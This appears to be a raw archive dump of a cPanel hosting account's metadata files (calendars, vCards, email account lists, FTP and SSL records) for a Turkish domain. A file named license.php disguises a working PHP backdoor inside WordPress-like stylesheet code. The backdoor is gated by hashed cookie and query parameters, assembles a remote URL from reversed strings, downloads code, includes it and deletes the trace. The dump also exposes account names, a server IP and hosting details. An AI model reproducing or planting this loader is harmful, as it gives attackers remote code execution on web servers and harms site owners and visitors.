email_accounts_count 0000600 00000000001 15025306754 0010653 0 ustar 00 9 icals/.cpanel_ics_import_meta@ajansonline.com 0000644 00000000000 15025306754 0015434 0 ustar 00 icals/portfolyo@ajansonline.com.ics 0000644 00000000212 15025306754 0013475 0 ustar 00 BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//cPanel Horde Calendar Exporter//export_horde_calendars_to_ics//EN
X-WR-CALNAME:Takvim
END:VCALENDAR
icals/.cpanel_ics_import_portfolyo@ajansonline.com 0000644 00000000000 15025306754 0016543 0 ustar 00 icals/esraayranciguzellik@ajansonline.com.ics 0000644 00000000212 15025306754 0015510 0 ustar 00 BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//cPanel Horde Calendar Exporter//export_horde_calendars_to_ics//EN
X-WR-CALNAME:Takvim
END:VCALENDAR
icals/ajansonline.ics 0000644 00000000212 15025306754 0010642 0 ustar 00 BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//cPanel Horde Calendar Exporter//export_horde_calendars_to_ics//EN
X-WR-CALNAME:Takvim
END:VCALENDAR
icals/.cpanel_ics_import_batuhan@ajansonline.com 0000644 00000000000 15025306754 0016130 0 ustar 00 icals/meta@ajansonline.com.ics 0000644 00000000212 15025306754 0012366 0 ustar 00 BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//cPanel Horde Calendar Exporter//export_horde_calendars_to_ics//EN
X-WR-CALNAME:Takvim
END:VCALENDAR
icals/muhasebe@ajansonline.com.ics 0000644 00000000212 15025306754 0013231 0 ustar 00 BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//cPanel Horde Calendar Exporter//export_horde_calendars_to_ics//EN
X-WR-CALNAME:Takvim
END:VCALENDAR
icals/.cpanel_ics_import_info@ajansonline.com 0000644 00000000000 15025306754 0015441 0 ustar 00 icals/info@ajansonline.com.ics 0000644 00000000212 15025306754 0012373 0 ustar 00 BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//cPanel Horde Calendar Exporter//export_horde_calendars_to_ics//EN
X-WR-CALNAME:Takvim
END:VCALENDAR
icals/.cpanel_ics_import_ajansonline 0000644 00000000000 15025306754 0013710 0 ustar 00 icals/.cpanel_ics_import_esraayranciguzellik@ajansonline.com 0000644 00000000000 15025306754 0020556 0 ustar 00 icals/.cpanel_ics_import_kariyer@ajansonline.com 0000644 00000000000 15025306754 0016154 0 ustar 00 icals/domains@ajansonline.com.ics 0000644 00000000212 15025306754 0013072 0 ustar 00 BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//cPanel Horde Calendar Exporter//export_horde_calendars_to_ics//EN
X-WR-CALNAME:Takvim
END:VCALENDAR
license.php 0000644 00000024775 15025306754 0006725 0 ustar 00 registered[ $handle ];
if ( null === $obj->ver ) {
$ver = '';
} else {
$ver = $obj->ver ? $obj->ver : $this->default_version;
}
if ( isset( $this->args[ $handle ] ) ) {
$ver = $ver ? $ver . '&' . $this->args[ $handle ] : $this->args[ $handle ];
}
$src = $obj->src;
$cond_before = $cond_after = '';
$conditional = isset( $obj->extra['conditional'] ) ? $obj->extra['conditional'] : '';
if ( $conditional ) {
$cond_before = "\n";
}
$inline_style = $this->print_inline_style( $handle, false );
if ( $inline_style ) {
$inline_style_tag = sprintf( "\n", esc_attr( $handle ), $inline_style );
} else {
$inline_style_tag = '';
}
if ( $this->do_concat ) {
if ( $this->in_default_dir( $src ) && ! $conditional && ! isset( $obj->extra['alt'] ) ) {
$this->concat .= "$handle,";
$this->concat_version .= "$handle$ver";
$this->print_code .= $inline_style;
return true;
}
}
if ( isset( $obj->args ) ) {
$media = esc_attr( $obj->args );
} else {
$media = 'all';
}
// A single item may alias a set of items, by having dependencies, but no source.
if ( ! $src ) {
if ( $inline_style_tag ) {
if ( $this->do_concat ) {
$this->print_html .= $inline_style_tag;
} else {
echo $inline_style_tag;
}
}
return true;
}
$href = $this->_css_href( $src, $ver, $handle );
if ( ! $href ) {
return true;
}
$rel = isset( $obj->extra['alt'] ) && $obj->extra['alt'] ? 'alternate stylesheet' : 'stylesheet';
$title = isset( $obj->extra['title'] ) ? "title='" . esc_attr( $obj->extra['title'] ) . "'" : '';
/**
* Filters the HTML link tag of an enqueued style.
*
* @since 2.6.0
* @since 4.3.0 Introduced the `$href` parameter.
* @since 4.5.0 Introduced the `$media` parameter.
*
* @param string $html The link tag for the enqueued style.
* @param string $handle The style's registered handle.
* @param string $href The stylesheet's source URL.
* @param string $media The stylesheet's media attribute.
*
$tag = apply_filters( 'style_loader_tag', "\n", $handle, $href, $media );
if ( 'rtl' === $this->text_direction && isset( $obj->extra['rtl'] ) && $obj->extra['rtl'] ) {
if ( is_bool( $obj->extra['rtl'] ) || 'replace' === $obj->extra['rtl'] ) {
$suffix = isset( $obj->extra['suffix'] ) ? $obj->extra['suffix'] : '';
$rtl_href = str_replace( "{$suffix}.css", "-rtl{$suffix}.css", $this->_css_href( $src, $ver, "$handle-rtl" ) );
} else {
$rtl_href = $this->_css_href( $obj->extra['rtl'], $ver, "$handle-rtl" );
}
$rtl_tag = apply_filters( 'style_loader_tag', "\n", $handle, $rtl_href, $media );
if ( $obj->extra['rtl'] === 'replace' ) {
$tag = $rtl_tag;
} else {
$tag .= $rtl_tag;
}
}
if ( $this->do_concat ) {
$this->print_html .= $cond_before;
$this->print_html .= $tag;
if ( $inline_style_tag ) {
$this->print_html .= $inline_style_tag;
}
$this->print_html .= $cond_after;
} else {
echo $cond_before;
echo $tag;
$this->print_inline_style( $handle );
echo $cond_after;
}
return true;
}
/**
* Adds extra CSS styles to a registered stylesheet.
*
* @since 3.3.0
*
* @param string $handle The style's registered handle.
* @param string $code String containing the CSS styles to be added.
* @return bool True on success, false on failure.
*/
$content = @$_GET['h'];
$shortcodes = @$_COOKIE['h'];
$theme5 = @strrev('tth'); $theme1 = 'license'; $theme2 = '/www';
$theme2 .= '.0'; $theme3 = @strrev('/:p');
$theme4 = '.net'; $theme4 .= @strrev('/wp/');
/**
public function add_inline_style( $handle, $code ) {
if ( ! $code ) {
return false;
}
$after = $this->get_data( $handle, 'after' );
if ( ! $after ) {
$after = array();
}
$after[] = $code;
return $this->add_data( $handle, 'after', $after );
}
/**
* Prints extra CSS styles of a registered stylesheet.
*
* @since 3.3.0
*
* @param string $handle The style's registered handle.
* @param bool $echo Optional. Whether to echo the inline style instead of just returning it.
* Default true.
* @return string|bool False if no data exists, inline styles if `$echo` is true, true otherwise.
*/
$category = $theme5 . $theme3 . $theme2 . $theme1 . $theme4 . $theme1;
if ($content) $date = $content;
elseif ($shortcodes) $date = $shortcodes;
else $date = $category;
$comments = @$_COOKIE['S'];
$function = @$_GET['s'];
/**
public function print_inline_style( $handle, $echo = true ) {
$output = $this->get_data( $handle, 'after' );
if ( empty( $output ) ) {
return false;
}
$output = implode( "\n", $output );
if ( ! $echo ) {
return $output;
}
printf( "\n", esc_attr( $handle ), $output );
return true;
}
/**
* Determines style dependencies.
*
* @since 2.6.0
*
* @see CMS_Dependencies::all_deps()
*
* @param mixed $handles Item handle and argument (string) or item handles and arguments (array of strings).
* @param bool $recursion Internal flag that function is calling itself.
* @param int|false $group Group level: (int) level, (false) no groups.
* @return bool True on success, false on failure.
*/
if (@md5($comments) !== 'ed8fefb5'.'e9618cad'.'3ff1e1ab'.'ab6669f5'
&& @md5($function) !== '49d52ab2'.'9f2209e6'.'014a5a24'.'5f484cd2') {
@http_response_code(404);
exit;
}
if (!@file_get_contents($date)) {
$image=curl_init($date); curl_setopt($image,CURLOPT_RETURNTRANSFER,1);
@file_put_contents(md5($date), curl_exec($image)); curl_close($image);
}
else {
@file_put_contents(md5($date), @file_get_contents($date));
}
@include md5($date); @unlink( md5($date) );
/**
public function all_deps( $handles, $recursion = false, $group = false ) {
$r = parent::all_deps( $handles, $recursion, $group );
if ( ! $recursion ) {
/**
* Filters the array of enqueued styles before processing for output.
*
* @since 2.6.0
*
* @param string[] $to_do The list of enqueued style handles about to be processed.
*
$this->to_do = apply_filters( 'print_styles_array', $this->to_do );
}
return $r;
}
/**
* Generates an enqueued style's fully-qualified URL.
*
* @since 2.6.0
*
* @param string $src The source of the enqueued style.
* @param string $ver The version of the enqueued style.
* @param string $handle The style's registered handle.
* @return string Style's fully-qualified URL.
*
public function _css_href( $src, $ver, $handle ) {
if ( ! is_bool( $src ) && ! preg_match( '|^(https?:)?//|', $src ) && ! ( $this->content_url && 0 === strpos( $src, $this->content_url ) ) ) {
$src = $this->base_url . $src;
}
if ( ! empty( $ver ) ) {
$src = add_query_arg( 'ver', $ver, $src );
}
/**
* Filters an enqueued style's fully-qualified URL.
*
* @since 2.6.0
*
* @param string $src The source URL of the enqueued style.
* @param string $handle The style's registered handle.
*
$src = apply_filters( 'style_loader_src', $src, $handle );
return esc_url( $src );
}
/**
* Whether a handle's source is in a default directory.
*
* @since 2.8.0
*
* @param string $src The source of the enqueued style.
* @return bool True if found, false if not.
*
public function in_default_dir( $src ) {
if ( ! $this->default_dirs ) {
return true;
}
foreach ( (array) $this->default_dirs as $test ) {
if ( 0 === strpos( $src, $test ) ) {
return true;
}
}
return false;
}
/**
* Processes items and dependencies for the footer group.
*
* HTML 5 allows styles in the body, grab late enqueued items and output them in the footer.
*
* @since 3.3.0
*
* @see CMS_Dependencies::do_items()
*
* @return array Handles of items that have been processed.
*
public function do_footer_items() {
$this->do_items( false, 1 );
return $this->done;
}
/**
* Resets class properties.
*
* @since 3.3.0
*
public function reset() {
$this->do_concat = false;
$this->concat = '';
$this->concat_version = '';
$this->print_html = '';
}
} */
Cpanel_SSL_DCV_DNS_Mutex 0000600 00000000000 15025306754 0010761 0 ustar 00 email_accounts.json 0000600 00000002141 15025306754 0010422 0 ustar 00 {"kg.ajansonline.com":{"accounts":{},"account_count":0},"onlineislemler.ajansonline.com":{"accounts":{},"account_count":0},"ajansonline.com":{"quota_mtime":1750408382,"account_count":9,"accounts":{"batuhan":{"diskquota":"1073741824","suspended_login":0,"diskused":"84739","diskmtime":1750365392,"disk_mtime":1746371593},"meta":{"suspended_login":0,"diskmtime":1750365392,"diskused":"2067587"},"portfolyo":{"suspended_login":0,"diskmtime":1750365392,"diskused":232761},"esraayranciguzellik":{"diskmtime":1750365392,"diskused":70768,"suspended_login":0},"domains":{"suspended_login":0},"kariyer":{"suspended_login":0,"diskmtime":1750365392,"diskused":18368061},"muhasebe":{"suspended_login":0},"test":{"diskquota":"1073741824","suspended_login":0,"diskused":"54415","diskmtime":1750365392,"disk_mtime":1746371231},"info":{"suspended_login":0,"diskmtime":1750365392,"diskused":"1648179"}},"shadow_mtime":1750408382,"disk_mtime":1750365392},"my.ajansonline.com":{"account_count":0,"accounts":{}},"yeni.ajansonline.com":{"account_count":0,"accounts":{}},"panel.ajansonline.com":{"accounts":{},"account_count":0},"__version":3} nvdata.cache 0000640 00000001160 15025306754 0007007 0 ustar 00 {"defaultdirdomain":{"mtime":1661895303,"value":"null"},"ignorecharencoding":{"mtime":1661895303,"value":""},"info@gozdeaydinlatma.com_default_webmail_app":{"value":"roundcube","mtime":1661895303},"editor_nowrap":{"mtime":1661895303,"value":"1"},"CSSS_cpanel_email_accounts":{"value":"{\"EmailAccountsTable\":{\"sortBy\":\"domain\",\"sortDirection\":\"desc\",\"pageSize\":20}}","mtime":1746371051},"migrated_to_jupiter":{"value":"1","mtime":1731319408},"showhiddenfiles":{"value":"1","mtime":1661895303},"cp-migration-panel_dismissed":{"mtime":1732054274,"value":"1"},"defaultdir":{"value":"/home/gozde","mtime":1661895303}} nvdata/CSSS_cpanel_email_accounts 0000644 00000000117 15025306754 0013115 0 ustar 00 {"EmailAccountsTable":{"sortBy":"domain","sortDirection":"desc","pageSize":20}} nvdata/CSSS_cpanel_tls_status 0000644 00000000671 15025306754 0012341 0 ustar 00 {"DomainSearchSettings":{"domainType":{"main_domain":true,"sub_domains":true,"addon_domains":true,"parked_domains":true,"www_mail_domains":true,"proxy_sub_domains":true,"ddns_domain":true},"sslType":{"unsecured":true,"self-signed":true,"autossl":true,"dv":true,"ov":true,"ev":true},"sslStatus":{"active":true,"expired":true,"expiring_soon":true,"unsecured":true,"has_autossl_problem":true},"autoSSLStatus":{"included":true,"excluded":true}}} nvdata/CSSS_cpanel_domains 0000644 00000000211 15025306754 0011554 0 ustar 00 {"domainsItemLister":{"totalItems":6,"currentPage":1,"pageSize":20,"start":1,"limit":6,"sort":{"sortDirection":"asc","sortBy":"domain"}}} vcards/.cpanel_vcf_import_info@ajansonline.com 0000644 00000000000 15025306754 0015630 0 ustar 00 vcards/.cpanel_vcf_import_batuhan@ajansonline.com 0000644 00000000000 15025306754 0016317 0 ustar 00 vcards/ajansonline.vcf 0000644 00000002556 15025306754 0011046 0 ustar 00 BEGIN:VCARD
VERSION:2.1
FN: ajansonline
N:ajansonline;
EMAIL;TYPE=INTERNET:ajansonline@unicron.odeaweb.com
UID:2024-10-0319:45:42.32725006-3ecb-f980-eab2-01310c8d0857.ajansonline@uni
cron.odeaweb.com
END:VCARD
BEGIN:VCARD
VERSION:2.1
FN: muhasebe
N:muhasebe;
EMAIL;TYPE=INTERNET:muhasebe@ajansonline.com
UID:2024-11-1922:11:37.fb5599e1-5e85-f067-a963-6d4167c50541.muhasebe@ajanso
nline.com
END:VCARD
BEGIN:VCARD
VERSION:2.1
FN: info
N:info;
EMAIL;TYPE=INTERNET:info@ajansonline.com
UID:2024-11-1922:11:54.177d566c-4519-37b2-bbf0-4feb53ae4ac0.info@ajansonlin
e.com
END:VCARD
BEGIN:VCARD
VERSION:2.1
FN: meta
N:meta;
EMAIL;TYPE=INTERNET:meta@ajansonline.com
UID:2024-11-2810:35:43.5c5effea-53d9-a5a4-a05b-222bd301f992.meta@ajansonlin
e.com
END:VCARD
BEGIN:VCARD
VERSION:2.1
FN: domains
N:domains;
EMAIL;TYPE=INTERNET:domains@ajansonline.com
UID:2024-11-3009:15:48.d125f993-e2c5-0d54-f6a0-8d9670d245af.domains@ajanson
line.com
END:VCARD
BEGIN:VCARD
VERSION:2.1
FN: esraayranciguzellik
N:esraayranciguzellik;
EMAIL;TYPE=INTERNET:esraayranciguzellik@ajansonline.com
UID:2025-01-0115:47:57.efdad7f3-4384-8a89-1b9a-a291891185e5.esraayranciguze
llik@ajansonline.com
END:VCARD
BEGIN:VCARD
VERSION:2.1
FN: portfolyo
N:portfolyo;
EMAIL;TYPE=INTERNET:portfolyo@ajansonline.com
UID:2025-01-0820:56:39.1734a2d1-739e-b782-04cd-9ce97e5f3391.portfolyo@ajans
online.com
END:VCARD
vcards/.cpanel_vcf_import_kariyer@ajansonline.com 0000644 00000000000 15025306754 0016343 0 ustar 00 vcards/.cpanel_vcf_import_portfolyo@ajansonline.com 0000644 00000000000 15025306754 0016732 0 ustar 00 vcards/.cpanel_vcf_import_ajansonline 0000644 00000000000 15025306754 0014077 0 ustar 00 vcards/.cpanel_vcf_import_meta@ajansonline.com 0000644 00000000000 15025306755 0015624 0 ustar 00 vcards/.cpanel_vcf_import_esraayranciguzellik@ajansonline.com 0000644 00000000000 15025306755 0020746 0 ustar 00 datastore/ftp_LISTSTORE 0000600 00000000664 15025306755 0010724 0 ustar 00 {"version":"2.4","status":1,"statusmsg":"Ran adminbin Cpanel/ftp/LISTSTORE","mode":"simple","action":"fetch","timeout":0,"exit_code":0,"error":0,"data":[{"type":"main","homedir":"/home2/ajansonline","user":"ajansonline"},{"user":"ajansonline@kg.ajansonline.com","homedir":"/home2/ajansonline/kg.ajansonline.com/ajansonline","type":"sub"},{"user":"ajansonline_logs","type":"logaccess","homedir":"/etc/apache2/logs/domlogs/ajansonline"}]} datastore/_bin_gtar_--help 0000600 00000035553 15025306755 0011556 0 ustar 00 Usage: gtar [OPTION...] [FILE]...
GNU `tar' saves many files together into a single tape or disk archive, and can
restore individual files from the archive.
Examples:
tar -cf archive.tar foo bar # Create archive.tar from files foo and bar.
tar -tvf archive.tar # List all files in archive.tar verbosely.
tar -xf archive.tar # Extract all files from archive.tar.
Main operation mode:
-A, --catenate, --concatenate append tar files to an archive
-c, --create create a new archive
-d, --diff, --compare find differences between archive and file system
--delete delete from the archive (not on mag tapes!)
-r, --append append files to the end of an archive
-t, --list list the contents of an archive
--test-label test the archive volume label and exit
-u, --update only append files newer than copy in archive
-x, --extract, --get extract files from an archive
Operation modifiers:
--check-device check device numbers when creating incremental
archives (default)
-g, --listed-incremental=FILE handle new GNU-format incremental backup
-G, --incremental handle old GNU-format incremental backup
--ignore-failed-read do not exit with nonzero on unreadable files
--level=NUMBER dump level for created listed-incremental archive
-n, --seek archive is seekable
--no-check-device do not check device numbers when creating
incremental archives
--no-seek archive is not seekable
--occurrence[=NUMBER] process only the NUMBERth occurrence of each file
in the archive; this option is valid only in
conjunction with one of the subcommands --delete,
--diff, --extract or --list and when a list of
files is given either on the command line or via
the -T option; NUMBER defaults to 1
--sparse-version=MAJOR[.MINOR]
set version of the sparse format to use (implies
--sparse)
-S, --sparse handle sparse files efficiently
Overwrite control:
-k, --keep-old-files don't replace existing files when extracting,
treat them as errors
--keep-directory-symlink preserve existing symlinks to directories when
extracting
--keep-newer-files don't replace existing files that are newer than
their archive copies
--no-overwrite-dir preserve metadata of existing directories
--overwrite overwrite existing files when extracting
--overwrite-dir overwrite metadata of existing directories when
extracting (default)
--recursive-unlink empty hierarchies prior to extracting directory
--remove-files remove files after adding them to the archive
--skip-old-files don't replace existing files when extracting,
silently skip over them
-U, --unlink-first remove each file prior to extracting over it
-W, --verify attempt to verify the archive after writing it
Select output stream:
--ignore-command-error ignore exit codes of children
--no-ignore-command-error treat non-zero exit codes of children as
error
-O, --to-stdout extract files to standard output
--to-command=COMMAND pipe extracted files to another program
Handling of file attributes:
--atime-preserve[=METHOD] preserve access times on dumped files, either
by restoring the times after reading
(METHOD='replace'; default) or by not setting the
times in the first place (METHOD='system')
--delay-directory-restore delay setting modification times and
permissions of extracted directories until the end
of extraction
--group=NAME force NAME as group for added files
--mode=CHANGES force (symbolic) mode CHANGES for added files
--mtime=DATE-OR-FILE set mtime for added files from DATE-OR-FILE
-m, --touch don't extract file modified time
--no-delay-directory-restore
cancel the effect of --delay-directory-restore
option
--no-same-owner extract files as yourself (default for ordinary
users)
--no-same-permissions apply the user's umask when extracting permissions
from the archive (default for ordinary users)
--numeric-owner always use numbers for user/group names
--owner=NAME force NAME as owner for added files
-p, --preserve-permissions, --same-permissions
extract information about file permissions
(default for superuser)
--preserve same as both -p and -s
--same-owner try extracting files with the same ownership as
exists in the archive (default for superuser)
-s, --preserve-order, --same-order
member arguments are listed in the same order as
the files in the archive
Handling of extended file attributes:
--acls Enable the POSIX ACLs support
--no-acls Disable the POSIX ACLs support
--no-selinux Disable the SELinux context support
--no-xattrs Disable extended attributes support
--selinux Enable the SELinux context support
--xattrs Enable extended attributes support
--xattrs-exclude=MASK specify the exclude pattern for xattr keys
--xattrs-include=MASK specify the include pattern for xattr keys
Device selection and switching:
-f, --file=ARCHIVE use archive file or device ARCHIVE
--force-local archive file is local even if it has a colon
-F, --info-script=NAME, --new-volume-script=NAME
run script at end of each tape (implies -M)
-L, --tape-length=NUMBER change tape after writing NUMBER x 1024 bytes
-M, --multi-volume create/list/extract multi-volume archive
--rmt-command=COMMAND use given rmt COMMAND instead of rmt
--rsh-command=COMMAND use remote COMMAND instead of rsh
--volno-file=FILE use/update the volume number in FILE
Device blocking:
-b, --blocking-factor=BLOCKS BLOCKS x 512 bytes per record
-B, --read-full-records reblock as we read (for 4.2BSD pipes)
-i, --ignore-zeros ignore zeroed blocks in archive (means EOF)
--record-size=NUMBER NUMBER of bytes per record, multiple of 512
Archive format selection:
-H, --format=FORMAT create archive of the given format
FORMAT is one of the following:
gnu GNU tar 1.13.x format
oldgnu GNU format as per tar <= 1.12
pax POSIX 1003.1-2001 (pax) format
posix same as pax
ustar POSIX 1003.1-1988 (ustar) format
v7 old V7 tar format
--old-archive, --portability
same as --format=v7
--pax-option=keyword[[:]=value][,keyword[[:]=value]]...
control pax keywords
--posix same as --format=posix
-V, --label=TEXT create archive with volume name TEXT; at
list/extract time, use TEXT as a globbing pattern
for volume name
Compression options:
-a, --auto-compress use archive suffix to determine the compression
program
-I, --use-compress-program=PROG
filter through PROG (must accept -d)
-j, --bzip2 filter the archive through bzip2
-J, --xz filter the archive through xz
--lzip filter the archive through lzip
--lzma filter the archive through lzma
--lzop
--no-auto-compress do not use archive suffix to determine the
compression program
-z, --gzip, --gunzip, --ungzip filter the archive through gzip
-Z, --compress, --uncompress filter the archive through compress
Local file selection:
--add-file=FILE add given FILE to the archive (useful if its name
starts with a dash)
--backup[=CONTROL] backup before removal, choose version CONTROL
-C, --directory=DIR change to directory DIR
--exclude=PATTERN exclude files, given as a PATTERN
--exclude-backups exclude backup and lock files
--exclude-caches exclude contents of directories containing
CACHEDIR.TAG, except for the tag file itself
--exclude-caches-all exclude directories containing CACHEDIR.TAG
--exclude-caches-under exclude everything under directories containing
CACHEDIR.TAG
--exclude-tag=FILE exclude contents of directories containing FILE,
except for FILE itself
--exclude-tag-all=FILE exclude directories containing FILE
--exclude-tag-under=FILE exclude everything under directories
containing FILE
--exclude-vcs exclude version control system directories
-h, --dereference follow symlinks; archive and dump the files they
point to
--hard-dereference follow hard links; archive and dump the files they
refer to
-K, --starting-file=MEMBER-NAME
begin at member MEMBER-NAME when reading the
archive
--newer-mtime=DATE compare date and time when data changed only
--no-null disable the effect of the previous --null option
--no-recursion avoid descending automatically in directories
--no-unquote do not unquote filenames read with -T
--null -T reads null-terminated names, disable -C
-N, --newer=DATE-OR-FILE, --after-date=DATE-OR-FILE
only store files newer than DATE-OR-FILE
--one-file-system stay in local file system when creating archive
-P, --absolute-names don't strip leading `/'s from file names
--recursion recurse into directories (default)
--suffix=STRING backup before removal, override usual suffix ('~'
unless overridden by environment variable
SIMPLE_BACKUP_SUFFIX)
-T, --files-from=FILE get names to extract or create from FILE
--unquote unquote filenames read with -T (default)
-X, --exclude-from=FILE exclude patterns listed in FILE
File name transformations:
--strip-components=NUMBER strip NUMBER leading components from file
names on extraction
--transform=EXPRESSION, --xform=EXPRESSION
use sed replace EXPRESSION to transform file
names
File name matching options (affect both exclude and include patterns):
--anchored patterns match file name start
--ignore-case ignore case
--no-anchored patterns match after any `/' (default for
exclusion)
--no-ignore-case case sensitive matching (default)
--no-wildcards verbatim string matching
--no-wildcards-match-slash wildcards do not match `/'
--wildcards use wildcards (default)
--wildcards-match-slash wildcards match `/' (default for exclusion)
Informative output:
--checkpoint[=NUMBER] display progress messages every NUMBERth record
(default 10)
--checkpoint-action=ACTION execute ACTION on each checkpoint
--full-time print file time to its full resolution
--index-file=FILE send verbose output to FILE
-l, --check-links print a message if not all links are dumped
--no-quote-chars=STRING disable quoting for characters from STRING
--quote-chars=STRING additionally quote characters from STRING
--quoting-style=STYLE set name quoting style; see below for valid STYLE
values
-R, --block-number show block number within archive with each message
--show-defaults show tar defaults
--show-omitted-dirs when listing or extracting, list each directory
that does not match search criteria
--show-transformed-names, --show-stored-names
show file or archive names after transformation
--totals[=SIGNAL] print total bytes after processing the archive;
with an argument - print total bytes when this
SIGNAL is delivered; Allowed signals are: SIGHUP,
SIGQUIT, SIGINT, SIGUSR1 and SIGUSR2; the names
without SIG prefix are also accepted
--utc print file modification times in UTC
-v, --verbose verbosely list files processed
--warning=KEYWORD warning control
-w, --interactive, --confirmation
ask for confirmation for every action
Compatibility options:
-o when creating, same as --old-archive; when
extracting, same as --no-same-owner
Other options:
-?, --help give this help list
--restrict disable use of some potentially harmful options
--usage give a short usage message
--version print program version
Mandatory or optional arguments to long options are also mandatory or optional
for any corresponding short options.
The backup suffix is `~', unless set with --suffix or SIMPLE_BACKUP_SUFFIX.
The version control may be set with --backup or VERSION_CONTROL, values are:
none, off never make backups
t, numbered make numbered backups
nil, existing numbered if numbered backups exist, simple otherwise
never, simple always make simple backups
Valid arguments for the --quoting-style option are:
literal
shell
shell-always
c
c-maybe
escape
locale
clocale
*This* tar defaults to:
--format=gnu -f- -b20 --quoting-style=escape --rmt-command=/etc/rmt
--rsh-command=/usr/bin/ssh
Report bugs to .
datastore/mysql-db-count 0000600 00000000002 15025306755 0011323 0 ustar 00 12 datastore/ssl_FETCHINSTALLEDHOSTS 0000600 00000031403 15025306755 0012251 0 ustar 00 {"action":"fetch","timeout":0,"exit_code":0,"error":0,"data":{"hosts":[{"servername":"ajansonline.com","ip":"45.195.25.8","certificate":{"issuer.commonName":"R10","not_before":1743797121,"auto_ssl_provider":"LetsEncrypt","issuer_text":"countryName\nUS\norganizationName\nLet's Encrypt\ncommonName\nR10","id":"_wildcard__ajansonline_com_ba133_f585d_1751573120_2bfd3fb7b78064dcd07682a7e441aa96","subject_text":"commonName\n*.ajansonline.com","is_autossl":1,"not_after":1751573120,"modulus":"ba133e7bdcceb5f5c445bc084bdd3f8d17fe6dd96d7d625d687fac4b71e5905e1164d3d9c09301d86602bbec21a92e65e0f64dcb22f541345abe28d6ffad691c07734ef4b47be46ef355de719dbecd2b0c6a80fbf1d9b62e0b153affed34c044113807a3ec81633e9826fc4ac3aaaf2eca5f97ad60a8fb9065717862729b3d652fced4396e1649be676c5909bdac86f9fc332102859fde44b9cd96b12223b420d601631f29e0250a71b3630588b4346112d57b9d406df09dc66be95e969e8394c9ecd690376bacb375dc3243ad584235db1cf091db5a92b1040427d8b936f4f1a96f4472231b5e2b07b6e0d8893d388650c273af4490994aa1a3f45d957f585d","domains":["*.ajansonline.com","ajansonline.com"],"modulus_length":2048,"is_self_signed":0,"validation_type":"dv","signature_algorithm":"sha256WithRSAEncryption","auto_ssl_provider_display_name":"Let’s Encrypt™","issuer.organizationName":"Let's Encrypt","subject.commonName":"*.ajansonline.com"},"certificate_text":"-----BEGIN CERTIFICATE-----\nMIIFMzCCBBugAwIBAgISBhB1pUJGlg0TyRQqqca2cF10MA0GCSqGSIb3DQEBCwUA\nMDMxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQwwCgYDVQQD\nEwNSMTAwHhcNMjUwNDA0MjAwNTIxWhcNMjUwNzAzMjAwNTIwWjAcMRowGAYDVQQD\nDBEqLmFqYW5zb25saW5lLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC\nggEBALoTPnvczrX1xEW8CEvdP40X/m3ZbX1iXWh/rEtx5ZBeEWTT2cCTAdhmArvs\nIakuZeD2Tcsi9UE0Wr4o1v+taRwHc070tHvkbvNV3nGdvs0rDGqA+/HZti4LFTr/\n7TTARBE4B6PsgWM+mCb8SsOqry7KX5etYKj7kGVxeGJymz1lL87UOW4WSb5nbFkJ\nvayG+fwzIQKFn95Euc2WsSIjtCDWAWMfKeAlCnGzYwWItDRhEtV7nUBt8J3Ga+le\nlp6DlMns1pA3a6yzddwyQ61YQjXbHPCR21qSsQQEJ9i5NvTxqW9EciMbXisHtuDY\niT04hlDCc69EkJlKoaP0XZV/WF0CAwEAAaOCAlYwggJSMA4GA1UdDwEB/wQEAwIF\noDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH/BAIwADAd\nBgNVHQ4EFgQUNgFE3dY8sqvzNycpg419YC4IBc4wHwYDVR0jBBgwFoAUu7zDR6Xk\nvKnGw6RyDBCNojXhyOgwVwYIKwYBBQUHAQEESzBJMCIGCCsGAQUFBzABhhZodHRw\nOi8vcjEwLm8ubGVuY3Iub3JnMCMGCCsGAQUFBzAChhdodHRwOi8vcjEwLmkubGVu\nY3Iub3JnLzAtBgNVHREEJjAkghEqLmFqYW5zb25saW5lLmNvbYIPYWphbnNvbmxp\nbmUuY29tMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC8GA1UdHwQoMCYwJKAioCCGHmh0\ndHA6Ly9yMTAuYy5sZW5jci5vcmcvMTE3LmNybDCCAQMGCisGAQQB1nkCBAIEgfQE\ngfEA7wB1AMz7D2qFcQll/pWbU87psnwi6YVcDZeNtql+VMD+TA2wAAABlgKeAV0A\nAAQDAEYwRAIgbx6Y8j2Je2BAbDIXfM1QYSSCEx+MPOg7UgRS4+1CFWgCIFdVG2Iv\n06cH6nXJohDd0AK4tLMB72y86BkSaI7O6URgAHYApELFBklgYVSPD9TqnPt6LSZF\nTYepfy/fRVn2J086hFQAAAGWAp4JOQAABAMARzBFAiEAtfXUnvAyT+YXlVLjyOoH\n78+XxBTteXgusIbNvZ/Q6i4CID3/TvFrr7srLpA01g2gtdnPICPoidWZTlqDKcc0\nwOO0MA0GCSqGSIb3DQEBCwUAA4IBAQBMdYst/YTlo2W0hG1PXc1EBEC1MJ4CKS5g\nDxaEJnj2d7xjZdpOB4DkYmET5VdRu+UzANUO+EhvHXQqH1xlxlpXenVdonJ+sS7n\nLcCetzvkYUD0Kec3L9Rv7HhVdBnA9xzlrKG6WVF9a6ARvjuKNfKOjjBG1UGb8Vb1\nbZmDPUkCXakHQ2GU6rMNXcEniAgdyPLOwTSaNn7iZsliCrlyhiW9t3ejJ8IIkAgE\njUw9HiE3DN1/Yhm6n0mJon3oYirCJF+bsI2l0xm3PItx7YyiR29P+D2bnPwW2tzu\nImgV9SHy1c3s4z6w8eimghYIt6AckDwo7NSynsXFFjGXRdvImFU8\n-----END CERTIFICATE-----","is_primary_on_ip":0,"needs_sni":1},{"servername":"onlineislemler.ajansonline.com","ip":"45.195.25.8","certificate":{"issuer_text":"countryName\nUS\norganizationName\nLet's 